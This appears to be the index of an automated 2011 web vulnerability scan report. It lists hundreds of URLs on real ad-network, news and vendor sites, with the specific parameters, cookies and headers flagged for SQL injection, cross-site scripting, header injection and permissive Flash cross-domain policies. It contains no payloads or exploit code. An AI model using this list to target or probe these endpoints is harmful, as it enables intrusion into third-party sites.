XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 09172011-01

Report generated by XSS.CX at Sat Sep 17 12:36:31 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading

1. SQL injection

1.1. http://a.abc.com/service/sfp/omnitureconfig/ [REST URL parameter 1]

1.2. http://ad.doubleclick.net/adi/N884.abc.com/B5709785.10 [id cookie]

1.3. http://ad.doubleclick.net/adj/tmz.toofab.wb.dart/ [name of an arbitrarily supplied request parameter]

1.4. http://adsatt.abc.starwave.com/ad/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif [REST URL parameter 1]

1.5. http://adsatt.abc.starwave.com/ad/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif [REST URL parameter 2]

1.6. http://adsatt.abc.starwave.com/ad/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif [REST URL parameter 3]

1.7. http://adsatt.abc.starwave.com/ad/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif [REST URL parameter 4]

1.8. http://amch.questionmarket.com/adsc/d775029/8/923517/decide.php [REST URL parameter 1]

1.9. http://cdn.media.abc.go.com/m/images/global/generic/logo.png [REST URL parameter 1]

1.10. http://googleads.g.doubleclick.net/pagead/ads [jsv parameter]

1.11. http://googleads.g.doubleclick.net/pagead/ads [slotname parameter]

1.12. http://googleads.g.doubleclick.net/pagead/ads [url parameter]

1.13. http://q1.checkm8.com/adam/detect [C cookie]

1.14. http://q1.checkm8.com/adam/detect [WIDTH_RANGE parameter]

1.15. http://q1.checkm8.com/adam/detect [cat parameter]

1.16. http://q1.checkm8.com/adam/detect [name of an arbitrarily supplied request parameter]

1.17. http://q1.checkm8.com/adam/report [C cookie]

1.18. http://q1.checkm8.com/adam/report [Referer HTTP header]

1.19. http://safebrowsing-cache.google.com/safebrowsing/rd/ChFnb29nLXBoaXNoLXNoYXZhchAAGMnyCSDw8gkqCUx5AgD_____HzIFSXkCAAc [REST URL parameter 1]

1.20. http://showadsak.pubmatic.com/AdServer/AdServerServlet [ktextColor parameter]

1.21. http://tag.contextweb.com/TagPublish/GetAd.aspx [Referer HTTP header]

1.22. http://tag.contextweb.com/TagPublish/GetAd.aspx [ca parameter]

1.23. http://tag.contextweb.com/TagPublish/GetAd.aspx [cwu parameter]

1.24. http://tag.contextweb.com/TagPublish/GetAd.aspx [cxy parameter]

1.25. http://tag.contextweb.com/TagPublish/GetAd.aspx [dw parameter]

1.26. http://tag.contextweb.com/TagPublish/GetAd.aspx [epid parameter]

1.27. http://tag.contextweb.com/TagPublish/GetAd.aspx [esid parameter]

1.28. http://tag.contextweb.com/TagPublish/GetAd.aspx [pb_rtb_ev cookie]

1.29. http://tag.contextweb.com/TagPublish/GetAd.aspx [pxy parameter]

1.30. http://w88.go.com/b/ss/wdgabccom,wdgasec/1/H.16/s3647485188674 [REST URL parameter 3]

1.31. http://w88.go.com/b/ss/wdgabccom,wdgasec/1/H.16/s39185238005593 [REST URL parameter 1]

1.32. http://w88.go.com/b/ss/wdgabccom,wdgasec/1/H.16/s39185238005593 [REST URL parameter 2]

1.33. http://www.bradsdeals.com/dealsoftheday/subscribe/b [s parameter]

1.34. http://www.bradsdeals.com/dealsoftheday/subscribe/b [tid parameter]

1.35. http://www.bradsdeals.com/dealsoftheday/subscribe/b [utm_campaign parameter]

1.36. http://www.bradsdeals.com/dealsoftheday/subscribe/b [utm_content parameter]

1.37. http://www.bradsdeals.com/dealsoftheday/subscribe/b [utm_medium parameter]

1.38. http://www.bradsdeals.com/dealsoftheday/subscribe/b [utm_source parameter]

1.39. http://www.bradsdeals.com/res/opt/global.js [v parameter]

1.40. http://www.bradsdeals.com/res/opt/screen.css [v parameter]

2. Cross-site scripting (stored)

2.1. http://ar.voicefive.com/bmx3/broker.pli [pid parameter]

2.2. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [$ parameter]

2.3. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [$ parameter]

2.4. http://livechat.iadvize.com/chat_init.js [vuid cookie]

3. HTTP header injection

3.1. http://2912a.v.fwmrm.net/ad/l/1 [cr parameter]

3.2. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [$ parameter]

3.3. http://d7.zedo.com/utils/ecSet.js [v parameter]

3.4. http://usadmm.dotomi.com/dmm/servlet/dmm [rurl parameter]

4. Cross-site scripting (reflected)

4.1. http://a.abc.com/service/gremlin/js/files/ifixpng,scrollto,hook,jquery-bbq,jquery-rc4,parseurl,abc-utils,register-loader,social-link,register-abcreg,cookie,msgqueue,swfobject,sendmsg,global,share-global,facebook,facebooklike,autocompleter.js [REST URL parameter 5]

4.2. http://a.abc.com/service/sfp/omnitureconfig/ [pageURL parameter]

4.3. http://a.collective-media.net/adj/cm.rev_bostonherald/ [REST URL parameter 2]

4.4. http://a.collective-media.net/adj/cm.rev_bostonherald/ [name of an arbitrarily supplied request parameter]

4.5. http://a.collective-media.net/adj/cm.rev_bostonherald/ [sz parameter]

4.6. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [REST URL parameter 2]

4.7. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [REST URL parameter 3]

4.8. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [name of an arbitrarily supplied request parameter]

4.9. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [sz parameter]

4.10. http://a.collective-media.net/adj/q1.bosherald/be_news [REST URL parameter 2]

4.11. http://a.collective-media.net/adj/q1.bosherald/be_news [REST URL parameter 3]

4.12. http://a.collective-media.net/adj/q1.bosherald/be_news [name of an arbitrarily supplied request parameter]

4.13. http://a.collective-media.net/adj/q1.bosherald/be_news [sz parameter]

4.14. http://a.collective-media.net/adj/q1.bosherald/ent_fr [REST URL parameter 2]

4.15. http://a.collective-media.net/adj/q1.bosherald/ent_fr [REST URL parameter 3]

4.16. http://a.collective-media.net/adj/q1.bosherald/ent_fr [name of an arbitrarily supplied request parameter]

4.17. http://a.collective-media.net/adj/q1.bosherald/ent_fr [sz parameter]

4.18. http://a.collective-media.net/adj/q1.bosherald/news [REST URL parameter 2]

4.19. http://a.collective-media.net/adj/q1.bosherald/news [REST URL parameter 3]

4.20. http://a.collective-media.net/adj/q1.bosherald/news [name of an arbitrarily supplied request parameter]

4.21. http://a.collective-media.net/adj/q1.bosherald/news [sz parameter]

4.22. http://a.collective-media.net/cmadj/cm.rev_bostonherald/ [REST URL parameter 2]

4.23. http://a.collective-media.net/cmadj/cm.rev_bostonherald/ [sz parameter]

4.24. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [REST URL parameter 1]

4.25. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [REST URL parameter 2]

4.26. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [REST URL parameter 3]

4.27. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [sz parameter]

4.28. http://a.collective-media.net/cmadj/q1.bosherald/be_news [REST URL parameter 1]

4.29. http://a.collective-media.net/cmadj/q1.bosherald/be_news [REST URL parameter 2]

4.30. http://a.collective-media.net/cmadj/q1.bosherald/be_news [REST URL parameter 3]

4.31. http://a.collective-media.net/cmadj/q1.bosherald/be_news [sz parameter]

4.32. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [REST URL parameter 1]

4.33. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [REST URL parameter 2]

4.34. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [REST URL parameter 3]

4.35. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [sz parameter]

4.36. http://a.collective-media.net/cmadj/q1.bosherald/news [REST URL parameter 1]

4.37. http://a.collective-media.net/cmadj/q1.bosherald/news [REST URL parameter 2]

4.38. http://a.collective-media.net/cmadj/q1.bosherald/news [REST URL parameter 3]

4.39. http://a.collective-media.net/cmadj/q1.bosherald/news [sz parameter]

4.40. http://ad.yieldmanager.com/imp [u parameter]

4.41. http://adnxs.revsci.net/imp [Z parameter]

4.42. http://adnxs.revsci.net/imp [s parameter]

4.43. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]

4.44. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]

4.45. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]

4.46. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

4.47. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

4.48. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]

4.49. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]

4.50. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]

4.51. http://alerts.4info.com/alert/ads/dispatcher.jsp [ad_creative_id parameter]

4.52. http://alerts.4info.com/alert/ads/dispatcher.jsp [ad_referral_url parameter]

4.53. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_bg parameter]

4.54. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_bg parameter]

4.55. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_border parameter]

4.56. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_link parameter]

4.57. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_text_normal parameter]

4.58. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_text_normal parameter]

4.59. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_text_title parameter]

4.60. http://alerts.4info.com/alert/ads/dispatcher.jsp [default_league parameter]

4.61. http://alerts.4info.com/alert/ads/dispatcher.jsp [default_team parameter]

4.62. http://api.bizographics.com/v2/profile.redirect [api_key parameter]

4.63. http://api.dimestore.com/viapi [id parameter]

4.64. http://ar.voicefive.com/b/rc.pli [func parameter]

4.65. http://b.scorecardresearch.com/beacon.js [c1 parameter]

4.66. http://b.scorecardresearch.com/beacon.js [c10 parameter]

4.67. http://b.scorecardresearch.com/beacon.js [c15 parameter]

4.68. http://b.scorecardresearch.com/beacon.js [c2 parameter]

4.69. http://b.scorecardresearch.com/beacon.js [c3 parameter]

4.70. http://b.scorecardresearch.com/beacon.js [c4 parameter]

4.71. http://b.scorecardresearch.com/beacon.js [c5 parameter]

4.72. http://b.scorecardresearch.com/beacon.js [c6 parameter]

4.73. http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3 [REST URL parameter 2]

4.74. http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3 [REST URL parameter 3]

4.75. http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3 [REST URL parameter 4]

4.76. http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3 [REST URL parameter 5]

4.77. http://bh.heraldinteractive.com/includes/processAds.bg [companion parameter]

4.78. http://bh.heraldinteractive.com/includes/processAds.bg [companion parameter]

4.79. http://bh.heraldinteractive.com/includes/processAds.bg [page parameter]

4.80. http://bh.heraldinteractive.com/includes/processAds.bg [page parameter]

4.81. http://bh.heraldinteractive.com/includes/processAds.bg [position parameter]

4.82. http://bh.heraldinteractive.com/includes/processAds.bg [position parameter]

4.83. http://blekko.com/autocomplete [query parameter]

4.84. http://bostonherald.com/includes/processAds.bg [companion parameter]

4.85. http://bostonherald.com/includes/processAds.bg [companion parameter]

4.86. http://bostonherald.com/includes/processAds.bg [page parameter]

4.87. http://bostonherald.com/includes/processAds.bg [page parameter]

4.88. http://bostonherald.com/includes/processAds.bg [position parameter]

4.89. http://bostonherald.com/includes/processAds.bg [position parameter]

4.90. http://bostonheraldnie.newspaperdirect.com/epaper/Services/HomePageHandler.ashx [callback parameter]

4.91. http://bostonheraldnie.newspaperdirect.com/epaper/Services/HomePageHandler.ashx [callback parameter]

4.92. http://bostonheraldnie.newspaperdirect.com/epaper/check.session [callback parameter]

4.93. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]

4.94. http://cdnt.meteorsolutions.com/api/ie8_email [id parameter]

4.95. http://cdnt.meteorsolutions.com/api/ie8_email [jsonp parameter]

4.96. http://cdnt.meteorsolutions.com/api/track [jsonp parameter]

4.97. http://choices.truste.com/ca [c parameter]

4.98. http://choices.truste.com/ca [cid parameter]

4.99. http://choices.truste.com/ca [iplc parameter]

4.100. http://choices.truste.com/ca [plc parameter]

4.101. http://choices.truste.com/ca [zi parameter]

4.102. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [$ parameter]

4.103. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [$ parameter]

4.104. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [q parameter]

4.105. http://event.adxpose.com/event.flow [uid parameter]

4.106. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 2]

4.107. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 3]

4.108. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 4]

4.109. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 5]

4.110. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 6]

4.111. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 7]

4.112. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [name of an arbitrarily supplied request parameter]

4.113. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [sz parameter]

4.114. http://g2.gumgum.com/services/get [callback parameter]

4.115. http://ib.adnxs.com/ptj [redir parameter]

4.116. http://ibmwebsphere.tt.omtrdc.net/m2/ibmwebsphere/mbox/standard [mbox parameter]

4.117. http://imp.fetchback.com/serve/fb/adtag.js [clicktracking parameter]

4.118. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]

4.119. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]

4.120. http://jcp.org/en/jsr/all [name of an arbitrarily supplied request parameter]

4.121. http://js.revsci.net/gateway/gw.js [ali parameter]

4.122. http://js.revsci.net/gateway/gw.js [cid parameter]

4.123. http://js.revsci.net/gateway/gw.js [clen parameter]

4.124. http://js.revsci.net/gateway/gw.js [csid parameter]

4.125. http://js.revsci.net/gateway/gw.js [p parameter]

4.126. http://js.revsci.net/gateway/gw.js [pid parameter]

4.127. http://js.revsci.net/gateway/gw.js [pli parameter]

4.128. http://js.revsci.net/gateway/gw.js [ref parameter]

4.129. http://js.revsci.net/gateway/gw.js [sid parameter]

4.130. http://js.revsci.net/gateway/gw.js [ver parameter]

4.131. http://js.revsci.net/gateway/gw.js [vid parameter]

4.132. http://livechat.iadvize.com/rpc/referrer.php [get parameter]

4.133. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/auditude_entertainment_video/preroll/vast/sx/ss/a/@x75 [REST URL parameter 10]

4.134. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/auditude_entertainment_video/preroll/vast/sx/ss/a/@x75 [REST URL parameter 4]

4.135. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/auditude_news_video/preroll/vast/sx/ss/a/@x75 [REST URL parameter 10]

4.136. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/auditude_news_video/preroll/vast/sx/ss/a/@x75 [REST URL parameter 4]

4.137. http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/129334548@x91 [REST URL parameter 4]

4.138. http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/129334548@x91 [REST URL parameter 5]

4.139. http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/129334548@x91 [REST URL parameter 6]

4.140. http://pglb.buzzfed.com/63857/8b52baa86e5b07ac085974feb13e2090 [callback parameter]

4.141. http://pglb.buzzfed.com/63857/bb0a99aabad3110617eff2ef79bb3c27 [callback parameter]

4.142. http://pglb.buzzfed.com/63857/d9dfb925d83ec9decb12af7e255ebee7 [callback parameter]

4.143. http://pixel.adsafeprotected.com/jspix [anId parameter]

4.144. http://pixel.adsafeprotected.com/jspix [campId parameter]

4.145. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]

4.146. http://pixel.adsafeprotected.com/jspix [pubId parameter]

4.147. http://qa.n7.vp2.abc.go.com/crossdomain.xml [REST URL parameter 1]

4.148. http://qa.n7.vp2.abc.go.com/crossdomain.xml [REST URL parameter 1]

4.149. http://qa.n7.vp2.abc.go.com/xml/alert.xml [REST URL parameter 1]

4.150. http://qa.n7.vp2.abc.go.com/xml/alert.xml [REST URL parameter 1]

4.151. http://qa.n7.vp2.abc.go.com/xml/alert.xml [REST URL parameter 2]

4.152. http://query.yahooapis.com/v1/public/yql/uhTrending/cokeTrending2 [limit parameter]

4.153. http://router.infolinks.com/gsd/1316238723013.0 [callback parameter]

4.154. http://router.infolinks.com/gsd/1316238747946.0 [callback parameter]

4.155. http://router.infolinks.com/gsd/1316238789101.0 [callback parameter]

4.156. http://router.infolinks.com/gsd/1316238970770.0 [callback parameter]

4.157. http://router.infolinks.com/gsd/1316239040251.0 [callback parameter]

4.158. http://router.infolinks.com/gsd/1316239125269.0 [callback parameter]

4.159. http://router.infolinks.com/gsd/1316239185968.0 [callback parameter]

4.160. http://router.infolinks.com/gsd/1316239193603.0 [callback parameter]

4.161. http://rt1302.infolinks.com/action/doq.htm [rid parameter]

4.162. http://rt1302.infolinks.com/action/getads.htm [lid parameter]

4.163. http://rt1701.infolinks.com/action/doq.htm [rid parameter]

4.164. http://rt1702.infolinks.com/action/doq.htm [rid parameter]

4.165. http://rt1803.infolinks.com/action/doq.htm [rid parameter]

4.166. http://rt1804.infolinks.com/action/doq.htm [rid parameter]

4.167. http://rt1901.infolinks.com/action/doq.htm [rid parameter]

4.168. http://rt1903.infolinks.com/action/doq.htm [rid parameter]

4.169. http://s19.sitemeter.com/js/counter.asp [site parameter]

4.170. http://s19.sitemeter.com/js/counter.js [site parameter]

4.171. http://secure-us.imrworldwide.com/cgi-bin/m [REST URL parameter 2]

4.172. http://secure-us.imrworldwide.com/cgi-bin/m [at parameter]

4.173. http://secure-us.imrworldwide.com/cgi-bin/m [ci parameter]

4.174. http://secure-us.imrworldwide.com/cgi-bin/m [cr parameter]

4.175. http://secure-us.imrworldwide.com/cgi-bin/m [ep parameter]

4.176. http://secure-us.imrworldwide.com/cgi-bin/m [name of an arbitrarily supplied request parameter]

4.177. http://secure-us.imrworldwide.com/cgi-bin/m [r parameter]

4.178. http://secure-us.imrworldwide.com/cgi-bin/m [rt parameter]

4.179. http://secure-us.imrworldwide.com/cgi-bin/m [st parameter]

4.180. http://showadsak.pubmatic.com/AdServer/AdServerServlet [frameName parameter]

4.181. http://showadsak.pubmatic.com/AdServer/AdServerServlet [frameName parameter]

4.182. http://showadsak.pubmatic.com/AdServer/AdServerServlet [pageURL parameter]

4.183. http://showadsak.pubmatic.com/AdServer/AdServerServlet [ranreq parameter]

4.184. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]

4.185. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]

4.186. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]

4.187. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]

4.188. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]

4.189. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]

4.190. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]

4.191. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]

4.192. http://tps31.doubleverify.com/visit.js [plc parameter]

4.193. http://tps31.doubleverify.com/visit.js [sid parameter]

4.194. http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet [clickData parameter]

4.195. http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet [name of an arbitrarily supplied request parameter]

4.196. http://widgets.mobilelocalnews.com/ [uid parameter]

4.197. http://www-01.ibm.com/support/docview.wss [aid parameter]

4.198. http://www-01.ibm.com/support/docview.wss [name of an arbitrarily supplied request parameter]

4.199. http://www-146.ibm.com/nfluent/transwidget/tw.jsp [cd parameter]

4.200. http://www-146.ibm.com/nfluent/transwidget/tw.jsp [name of an arbitrarily supplied request parameter]

4.201. http://www.bostonherald.com/includes/processAds.bg [companion parameter]

4.202. http://www.bostonherald.com/includes/processAds.bg [companion parameter]

4.203. http://www.bostonherald.com/includes/processAds.bg [page parameter]

4.204. http://www.bostonherald.com/includes/processAds.bg [page parameter]

4.205. http://www.bostonherald.com/includes/processAds.bg [position parameter]

4.206. http://www.bostonherald.com/includes/processAds.bg [position parameter]

4.207. http://www.bradsdeals.com/dealsoftheday/subscribe/b [s parameter]

4.208. http://www.disenter.com/search.php [searchString parameter]

4.209. http://www.disenter.com/search.php [searchString parameter]

4.210. http://www.google.com/search [tch parameter]

4.211. http://www.jcp.org/en/home/index [REST URL parameter 3]

4.212. http://www.jcp.org/en/home/index [name of an arbitrarily supplied request parameter]

4.213. http://www.jcp.org/en/jsr/detail [id parameter]

4.214. http://www.jcp.org/en/jsr/detail [name of an arbitrarily supplied request parameter]

4.215. http://www.kaltura.com//api_v3/index.php [1%3Aaction parameter]

4.216. http://www.kaltura.com//api_v3/index.php [1%3AentryId parameter]

4.217. http://www.kaltura.com//api_v3/index.php [1%3Aservice parameter]

4.218. http://www.kaltura.com//api_v3/index.php [2%3Aaction parameter]

4.219. http://www.kaltura.com//api_v3/index.php [2%3AentryId parameter]

4.220. http://www.kaltura.com//api_v3/index.php [2%3Aservice parameter]

4.221. http://www.kaltura.com//api_v3/index.php [3%3Aaction parameter]

4.222. http://www.kaltura.com//api_v3/index.php [3%3AentryId parameter]

4.223. http://www.kaltura.com//api_v3/index.php [3%3Aservice parameter]

4.224. http://www.kaltura.com//api_v3/index.php [4%3Aaction parameter]

4.225. http://www.kaltura.com//api_v3/index.php [4%3Aservice parameter]

4.226. http://www.kaltura.com//api_v3/index.php [ks parameter]

4.227. http://www.kaltura.com//api_v3/index.php [name of an arbitrarily supplied request parameter]

4.228. http://www.kaltura.com//api_v3/index.php [service parameter]

4.229. http://www.open.com.au/cgi-bin/sf.cgi [config parameter]

4.230. https://www.open.com.au/cgi-bin/sf.cgi [config parameter]

4.231. https://www.open.com.au/onlineorder.php [name of an arbitrarily supplied request parameter]

4.232. http://www.vm.ibm.com/search/search.cgi [FILTER parameter]

4.233. http://www.vm.ibm.com/search/search.cgi [FILTER parameter]

4.234. http://www.vm.ibm.com/search/search.cgi [WORDS parameter]

4.235. http://www.vm.ibm.com/search/search.cgi [WORDS parameter]

4.236. http://www.westhost.com/images/bluegradbg.gif [REST URL parameter 1]

4.237. http://www.westhost.com/images/bluegradbg.gif [name of an arbitrarily supplied request parameter]

4.238. http://www.westhost.com/images/boxtopbackground.gif [REST URL parameter 1]

4.239. http://www.westhost.com/images/boxtopbackground.gif [name of an arbitrarily supplied request parameter]

4.240. http://adnxs.revsci.net/imp [Referer HTTP header]

4.241. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [Referer HTTP header]

4.242. http://livechat.iadvize.com/chat_init.js [Referer HTTP header]

4.243. http://pixel.adsafeprotected.com/jspix [Referer HTTP header]

4.244. http://www.westhost.com/images/bluegradbg.gif [Referer HTTP header]

4.245. http://www.westhost.com/images/boxtopbackground.gif [Referer HTTP header]

4.246. http://3ps.go.com/DynamicAd [tqq cookie]

4.247. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

4.248. http://ar.voicefive.com/bmx3/broker.pli [ar_p110620504 cookie]

4.249. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]

4.250. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]

4.251. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]

4.252. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [ZEDOIDA cookie]

4.253. http://livechat.iadvize.com/chat_init.js [vuid cookie]

4.254. http://s19.sitemeter.com/js/counter.asp [IP cookie]

4.255. http://s19.sitemeter.com/js/counter.js [IP cookie]

4.256. http://www.websitealive2.com/89/visitor/vTrackerSrc_v2.asp [wsa cookie]

5. Flash cross-domain policy

5.1. http://2912a.v.fwmrm.net/crossdomain.xml

5.2. http://3ps.go.com/crossdomain.xml

5.3. http://a.collective-media.net/crossdomain.xml

5.4. http://a.tribalfusion.com/crossdomain.xml

5.5. http://a1.interclick.com/crossdomain.xml

5.6. http://abc.csar.go.com/crossdomain.xml

5.7. http://action.media6degrees.com/crossdomain.xml

5.8. http://ad.afy11.net/crossdomain.xml

5.9. http://ad.auditude.com/crossdomain.xml

5.10. http://ad.turn.com/crossdomain.xml

5.11. http://adm.fwmrm.net/crossdomain.xml

5.12. http://admin.brightcove.com/crossdomain.xml

5.13. http://ads.yimg.com/crossdomain.xml

5.14. http://adserver.teracent.net/crossdomain.xml

5.15. http://adunit.cdn.auditude.com/crossdomain.xml

5.16. http://afe.specificclick.net/crossdomain.xml

5.17. http://alerts.4info.com/crossdomain.xml

5.18. http://amch.questionmarket.com/crossdomain.xml

5.19. http://analytics.newsinc.com/crossdomain.xml

5.20. http://aperture.displaymarketplace.com/crossdomain.xml

5.21. http://api.dimestore.com/crossdomain.xml

5.22. http://api.facebook.com/crossdomain.xml

5.23. http://ar.voicefive.com/crossdomain.xml

5.24. http://as.casalemedia.com/crossdomain.xml

5.25. http://as1.suitesmart.com/crossdomain.xml

5.26. http://assets.newsinc.com/crossdomain.xml

5.27. http://at.amgdgt.com/crossdomain.xml

5.28. http://b.voicefive.com/crossdomain.xml

5.29. http://b3.mookie1.com/crossdomain.xml

5.30. http://beta.abc.go.com/crossdomain.xml

5.31. http://bp.specificclick.net/crossdomain.xml

5.32. http://bs.serving-sys.com/crossdomain.xml

5.33. http://c.betrad.com/crossdomain.xml

5.34. http://c.brightcove.com/crossdomain.xml

5.35. http://cache.specificmedia.com/crossdomain.xml

5.36. http://cache2-scripts.pressdisplay.com/crossdomain.xml

5.37. http://cache2-styles.pressdisplay.com/crossdomain.xml

5.38. http://cdn.gigya.com/crossdomain.xml

5.39. http://cdn.kaltura.com/crossdomain.xml

5.40. http://cdn.turn.com/crossdomain.xml

5.41. http://cdnbakmi.kaltura.com/crossdomain.xml

5.42. http://clk.atdmt.com/crossdomain.xml

5.43. http://cplads.appspot.com/crossdomain.xml

5.44. http://d14.zedo.com/crossdomain.xml

5.45. http://d7.zedo.com/crossdomain.xml

5.46. http://dc.tremormedia.com/crossdomain.xml

5.47. http://dp.33across.com/crossdomain.xml

5.48. http://ds.serving-sys.com/crossdomain.xml

5.49. http://edge.aperture.displaymarketplace.com/crossdomain.xml

5.50. http://event.adxpose.com/crossdomain.xml

5.51. http://external.ak.fbcdn.net/crossdomain.xml

5.52. http://fw.adsafeprotected.com/crossdomain.xml

5.53. http://g-pixel.invitemedia.com/crossdomain.xml

5.54. http://g.ca.bid.invitemedia.com/crossdomain.xml

5.55. http://g2.gumgum.com/crossdomain.xml

5.56. http://goku.brightcove.com/crossdomain.xml

5.57. http://gscounters.gigya.com/crossdomain.xml

5.58. http://i.w55c.net/crossdomain.xml

5.59. http://ib.adnxs.com/crossdomain.xml

5.60. http://imagec12.247realmedia.com/crossdomain.xml

5.61. http://imp.fetchback.com/crossdomain.xml

5.62. http://js.revsci.net/crossdomain.xml

5.63. http://l.betrad.com/crossdomain.xml

5.64. http://l.yimg.com/crossdomain.xml

5.65. http://ll.static.abc.com/crossdomain.xml

5.66. http://llnwdo28.tmz.com/crossdomain.xml

5.67. http://load.exelator.com/crossdomain.xml

5.68. http://load.tubemogul.com/crossdomain.xml

5.69. http://loadm.exelator.com/crossdomain.xml

5.70. http://log.go.com/crossdomain.xml

5.71. http://map.media6degrees.com/crossdomain.xml

5.72. http://media.fastclick.net/crossdomain.xml

5.73. http://metrics.tmz.com/crossdomain.xml

5.74. http://network.realmedia.com/crossdomain.xml

5.75. http://oascentral.bostonherald.com/crossdomain.xml

5.76. http://objects.tremormedia.com/crossdomain.xml

5.77. http://odb.outbrain.com/crossdomain.xml

5.78. http://ping.crowdscience.com/crossdomain.xml

5.79. http://pix04.revsci.net/crossdomain.xml

5.80. http://pixel.33across.com/crossdomain.xml

5.81. http://pixel.adsafeprotected.com/crossdomain.xml

5.82. http://pixel.invitemedia.com/crossdomain.xml

5.83. http://ps2.newsinc.com/crossdomain.xml

5.84. http://puma.vizu.com/crossdomain.xml

5.85. http://q1.checkm8.com/crossdomain.xml

5.86. http://query.yahooapis.com/crossdomain.xml

5.87. http://r.casalemedia.com/crossdomain.xml

5.88. http://r.turn.com/crossdomain.xml

5.89. http://r1-ads.ace.advertising.com/crossdomain.xml

5.90. http://r1.zedo.com/crossdomain.xml

5.91. http://receive.inplay.tubemogul.com/crossdomain.xml

5.92. http://resources.infolinks.com/crossdomain.xml

5.93. http://rs.gwallet.com/crossdomain.xml

5.94. http://rt1302.infolinks.com/crossdomain.xml

5.95. http://rt1701.infolinks.com/crossdomain.xml

